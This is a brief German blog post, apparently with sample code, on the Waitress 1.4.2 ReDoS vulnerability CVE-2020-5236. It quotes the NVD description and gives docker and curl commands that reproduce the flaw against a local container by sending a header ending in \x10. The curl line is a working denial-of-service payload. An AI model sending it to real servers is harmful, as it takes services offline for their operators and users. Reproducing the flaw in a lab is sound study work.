
Waitress 1.4.2 ReDoS - CVE-2020-5236 (Blog-Beispielcode)
Waitress Version 1.4.2 ermöglicht einen DOS-Angriff, wenn Waitress einen Header mit ungültigen Zeichen empfängt. Wenn ein Header wie "Bad-header: xxxxxxxxxxxxxxx\x10" empfangen wird, führt dies dazu, dass die Regex-Engine katastrophal zurückverfolgt (catastrophic backtracking), was dazu führt, dass der Prozess 100% CPU-Zeit verbraucht und alle anderen Interaktionen blockiert. Dies ermöglicht einem Angreifer, eine einzelne Anfrage mit einem ungültigen Header zu senden und den Dienst außer Betrieb zu nehmen.
von NVD
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"
Zeige CPU-Auslastung des Servers. Führe "docker stats waitress" aus.
↓ PoC ausführen
